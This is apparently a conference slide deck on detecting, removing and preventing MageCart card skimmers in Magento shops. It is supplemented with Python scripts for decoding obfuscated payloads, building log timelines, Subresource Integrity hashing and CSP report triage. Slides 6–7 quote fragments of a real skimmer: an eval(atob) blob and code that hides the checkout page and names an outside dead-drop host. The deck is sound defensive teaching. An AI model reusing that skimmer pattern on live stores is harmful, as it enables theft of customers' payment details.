Slide 1

Locking down your Magento Shop
Tom Robertshaw @bobbyshaw

Slide 2

MageCart
And 10,000s more.

Slide 3

MageCart
● 20 lines of JS
● Duplicates form submissions to dead-drop.
● Invisible to merchant and customer.

Slide 4

Dude, where’s my checkout?

Slide 5

Identify
“The checkout’s broken”
“Wait a minute, that’s not our checkout.”

Slide 6

Identify
eval(atob("ZnVuY3Rpb24gc2V0QzAxKG5hbWUsdmFsdWUsZGF5..."));

Slide 7

Identify
if (document.title == "One Step Checkout | Merchant Name") {
    var __gt2 = "https://api-secure-checkout.com";
    var __b0 = document.body;
    __b0.insertAdjacentHTML('beforebegin', '');
    __b0.style.display = "none";
}
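
The two identification slides above show the tell-tales: a base64 blob fed to eval(atob(...)), and a decoded payload that checks the page title, injects markup and hides the real body. The following Python script is an added example, not code from the talk: it scans a copy of a Magento "Miscellaneous Scripts" value (or any template HTML) for eval(atob("...")) wrappers, decodes them, and lists which of those behaviours and which external URLs each payload contains. The sample input it scans is constructed for the example; the indicator names and the regexes are assumptions of this script, not part of any Magento or MageCart tooling.

```python
import base64
import re

# Constructed sample of a Magento "Miscellaneous Scripts" config value
# (not the skimmer from the talk): one ordinary tag plus an eval(atob("..."))
# wrapper around a payload showing the behaviours slide 7 describes.
_CONSTRUCTED_PAYLOAD = (
    'if (document.title == "One Step Checkout | Example Shop") {'
    ' var t = "https://constructed-dead-drop.invalid";'
    ' document.body.style.display = "none"; }'
)
CONSTRUCTED_MISC_SCRIPTS = (
    '<script src="/js/analytics.js"></script>\n'
    '<script>eval(atob("'
    + base64.b64encode(_CONSTRUCTED_PAYLOAD.encode()).decode()
    + '"));</script>'
)

# eval(atob("<base64>")) with optional whitespace and either quote style.
EVAL_ATOB_RE = re.compile(
    r'eval\s*\(\s*atob\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)'
)

# Behaviours from slide 7 that a legitimate tag rarely combines (assumed names).
INDICATORS = {
    "checks page title": re.compile(r"document\.title\s*=="),
    "hides body": re.compile(r"\.style\.display\s*=\s*[\"']none[\"']"),
    "injects HTML": re.compile(r"insertAdjacentHTML"),
}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def decode_eval_atob(script_html):
    """Return the decoded payload of every eval(atob("...")) in the input."""
    payloads = []
    for match in EVAL_ATOB_RE.finditer(script_html):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:      # binascii.Error is a ValueError subclass
            continue            # not valid base64: leave it for manual review
        payloads.append(raw.decode("utf-8", errors="replace"))
    return payloads


def triage(script_html):
    """One finding per decoded payload: the indicators it matched and any
    URLs it references (the dead-drop candidates to preserve and report)."""
    findings = []
    for payload in decode_eval_atob(script_html):
        findings.append({
            "indicators": [n for n, rx in INDICATORS.items() if rx.search(payload)],
            "urls": URL_RE.findall(payload),
            "payload": payload,
        })
    return findings


if __name__ == "__main__":
    for f in triage(CONSTRUCTED_MISC_SCRIPTS):
        print("indicators:", ", ".join(f["indicators"]))
        print("urls:", f["urls"])
        print(f["payload"])
```

Run it against an export of the design config and the theme's template files before anything is deleted, so the decoded payload and the dead-drop URL are captured for the preserve step that follows.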

Slide 8

Preserve
● Admin User
  ○ Name, Email, Changed and Updated At
● Misc Scripts Config
  ○ The breach

Slide 9

Remove Hack
● Delete Admin User
● Remove script from Misc Scripts Config
● Review and Redeploy all files

Slide 10

Investigate
● When?
● What?
● How?

Slide 11

Investigate
● Admin actions log
● Web server access log

216.151.184.62 - - [29/Jan/2019:11:30:46 +0000] "GET /downloader/ HTTP/1.1" 200 18034
216.151.184.62 - - [04/Feb/2019:14:48:16 +0000] "GET /index.php/admin/permissions_user/new/key/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 17907
216.151.184.62 - - [04/Feb/2019:15:23:10 +0000] "POST /index.php/admin/system_config/save/section/design/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200
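
The access log excerpt above answers "when" and "how" once the right requests are pulled out: the downloader (Magento Connect Manager), the admin user form, and a save of the design config section where the Miscellaneous Scripts field lives. The Python below is an added example and not part of the talk: it parses Common Log Format lines, tags requests that match those three paths, and returns them as a time-ordered timeline with the first-seen time per source IP. The three log lines are the ones on the slide; the fourth, benign line is constructed, and the rule names are this script's own.

```python
import re
from datetime import datetime

# The three lines shown on the slide, plus one constructed benign request so
# the filter has something to ignore.
ACCESS_LOG = """\
216.151.184.62 - - [29/Jan/2019:11:30:46 +0000] "GET /downloader/ HTTP/1.1" 200 18034
216.151.184.62 - - [04/Feb/2019:14:48:16 +0000] "GET /index.php/admin/permissions_user/new/key/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 17907
216.151.184.62 - - [04/Feb/2019:15:23:10 +0000] "POST /index.php/admin/system_config/save/section/design/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200
10.0.0.5 - - [04/Feb/2019:15:25:00 +0000] "GET /catalog/product/view/id/1/ HTTP/1.1" 200 5120
"""

# Common Log Format; the response size is optional because the slide's
# third line has none.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})(?: (?P<size>\d+|-))?'
)

# Paths from the slide: the Connect Manager / downloader, admin user
# management, and the design section of system config (Misc Scripts).
RULES = [
    ("downloader access", re.compile(r"^/downloader/")),
    ("admin user management", re.compile(r"/admin/permissions_user/")),
    ("design config saved (Misc Scripts)",
     re.compile(r"/admin/system_config/save/section/design")),
]


def parse_line(line):
    """One CLF line to a dict with an aware datetime, or None if it does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def timeline(log_text):
    """Suspicious requests in time order, each tagged with the rule it hit."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, rx in RULES:
            if rx.search(rec["path"]):
                events.append({"ts": rec["ts"], "ip": rec["ip"], "rule": name,
                               "method": rec["method"], "path": rec["path"]})
    return sorted(events, key=lambda e: e["ts"])


def first_seen_by_ip(events):
    """Earliest suspicious hit per source IP: the 'when' for each actor."""
    first = {}
    for e in events:
        first.setdefault(e["ip"], e["ts"])
    return first


if __name__ == "__main__":
    for e in timeline(ACCESS_LOG):
        print(e["ts"].isoformat(), e["ip"], e["rule"], e["method"], e["path"])
```

The first-seen time is the lower bound for how long customer data may have been skimmed; pair it with the admin actions log to confirm which account performed the config save.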

Slide 12

Investigate
● Code Vulnerability
  ○ Core, third-party plugins, bespoke plugins
● Admin access
  ○ Brute force, Infected staff computers
● External software
  ○ Phpmyadmin (adminer), magmi

Slide 13

Close Up Breach
● Rotate passwords
● Remove Downloader
● Implement next level of security
  ○ E.g. IP restricted admin

Slide 14

Close Up Breach
Report nefarious domain and IP to registrar and host.

Slide 15

Report
● Customers
● ICO
● Payment providers
● Insurers

Slide 16

Monitor
Monitor for new breaches.

Slide 17

Security Monitoring
https://sansec.io/

Slide 18

Breach Response Summary
1. Identify
2. Preserve
3. Remove Hack
4. Investigate
5. Close up breach
6. Report
7. Monitor

Slide 19

No one is safe
“I use an iframe payment gateway, I’m safe”

Slide 20

What should you do? How much should you spend?

Slide 21

Business Impact
● Fines from Visa & Mastercard
● Increased transaction costs
● Increased business insurance costs
● Fines from ICO
● Loss of business as customers lose trust
● Time & money spent investigating and resolving hack

Slide 22

The Dichotomy
Marketing Team vs Security Team
Flexibility vs control

Slide 23

Admin Security
● Password management tool
● Two-factor auth or IP whitelisting

Slide 24

Firewalls
Web application firewall, e.g. Cloudflare

Slide 25

Code
● Keep core & modules up to date
● Security audit each module

Slide 26

Subresource Integrity
● Sign your JS where possible.
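
Subresource Integrity pins an external script to a hash of its expected content, so a swapped or tampered copy is refused by the browser. The Python below is an added example, not from the talk: it generates the integrity attribute for a script, emits the tag to paste into the template, and emulates the browser-side check (strongest listed algorithm wins, any matching hash for it passes). The script bytes it hashes are constructed stand-ins, and the function names are this example's own.

```python
import base64
import hashlib

# Algorithms SRI allows, weakest to strongest.
SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """integrity value for a script: '<algo>-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes, algo: str = "sha384") -> str:
    """Tag for the template; crossorigin is needed for cross-origin scripts."""
    return (f'<script src="{src}" integrity="{sri_hash(content, algo)}" '
            f'crossorigin="anonymous"></script>')


def verify_sri(content: bytes, integrity: str) -> bool:
    """What the browser does: the fetched bytes must match one of the hashes
    given for the strongest algorithm present in the integrity attribute."""
    by_algo = {}
    for token in integrity.split():
        algo, sep, _ = token.partition("-")
        if sep and algo in SRI_ALGOS:
            by_algo.setdefault(algo, set()).add(token)
    if not by_algo:
        return False
    strongest = max(by_algo, key=SRI_ALGOS.index)
    return sri_hash(content, strongest) in by_algo[strongest]


# Constructed stand-ins for a third-party tag and a modified copy of it.
CONSTRUCTED_JS = b"window.dataLayer = window.dataLayer || [];\n"
TAMPERED_JS = CONSTRUCTED_JS + b"// one extra line\n"


if __name__ == "__main__":
    tag = script_tag("https://cdn.example.invalid/tag.js", CONSTRUCTED_JS)
    print(tag)
    print("original passes:", verify_sri(CONSTRUCTED_JS, sri_hash(CONSTRUCTED_JS)))
    print("tampered passes:", verify_sri(TAMPERED_JS, sri_hash(CONSTRUCTED_JS)))
```

This is why the slide says "where possible": SRI only works for scripts whose content is fixed at deploy time. It cannot protect a vendor tag that changes without notice, and it does nothing for script injected into the Miscellaneous Scripts field itself, which is served inline from the shop's own origin.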

Slide 27

Content Security Policies
Block/Monitor loaded assets

Content-Security-Policy-Report-Only: default-src 'self'; report-uri https://test-report.trackcsp.com/v1/494b06af-eb50-4c85-9097-aa7c31e591b9
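
The header on the slide is Report-Only, so nothing is blocked; its value is the stream of violation reports the browser POSTs to report-uri, which is where a script loading from an unfamiliar domain shows up. The Python below is an added example and not part of the talk or of any reporting service: it takes report bodies in the JSON shape browsers send, reduces each to its origin, sorts them into expected, investigate, or review (inline and eval violations, which a default-src 'self' policy will report constantly on a Magento page), and counts reports per unrecognised origin. The allowlist and the reports are constructed for the example.

```python
import json
from collections import Counter
from urllib.parse import urlsplit

# Origins the shop knowingly loads from (constructed allowlist).
ALLOWED_ORIGINS = {"https://shop.example.invalid", "https://cdn.example.invalid"}


def make_report(blocked_uri, directive="script-src"):
    """A report body in the shape browsers POST to report-uri (constructed data)."""
    return json.dumps({"csp-report": {
        "document-uri": "https://shop.example.invalid/checkout/onepage/",
        "violated-directive": directive,
        "effective-directive": directive,
        "original-policy": "default-src 'self'; report-uri https://csp.example.invalid/r",
        "blocked-uri": blocked_uri,
    }})


CONSTRUCTED_REPORTS = [
    make_report("https://cdn.example.invalid/tag.js"),
    make_report("https://constructed-dead-drop.invalid/loader.js"),
    make_report("https://constructed-dead-drop.invalid/loader.js"),
    make_report("inline"),
]


def triage_report(body, allowed=ALLOWED_ORIGINS):
    """Classify one report: expected origin, unknown origin, or inline/eval noise."""
    r = json.loads(body).get("csp-report", {})
    blocked = r.get("blocked-uri", "")
    directive = r.get("effective-directive") or r.get("violated-directive", "")
    page = r.get("document-uri", "")
    # Browsers report 'inline' / 'eval' (older ones 'self') instead of a URL
    # for inline scripts and eval(); on a checkout page that still merits a
    # look (see slide 6), but it is not an external origin to block.
    if "://" not in blocked:
        return {"severity": "review", "origin": blocked,
                "directive": directive, "page": page}
    parts = urlsplit(blocked)
    origin = f"{parts.scheme}://{parts.netloc}"
    severity = "expected" if origin in allowed else "investigate"
    return {"severity": severity, "origin": origin,
            "directive": directive, "page": page}


def unexpected_origins(bodies, allowed=ALLOWED_ORIGINS):
    """Reports per origin not on the allowlist: the short list a merchant
    scans each day for a domain nobody recognises."""
    counts = Counter()
    for body in bodies:
        t = triage_report(body, allowed)
        if t["severity"] == "investigate":
            counts[t["origin"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for body in CONSTRUCTED_REPORTS:
        print(triage_report(body))
    print(unexpected_origins(CONSTRUCTED_REPORTS))
```

Once the report stream is quiet apart from known origins, the same policy can be tightened and switched from Content-Security-Policy-Report-Only to Content-Security-Policy, at which point the browser actually blocks the load instead of only reporting it.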

Slide 28

Listen to Industry Experts
@gwillem
@_talesh

Slide 29

Talesh Seeparsan’s Incident Response Template
https://github.com/talesh/response

Slide 30

Thanks
@bobbyshaw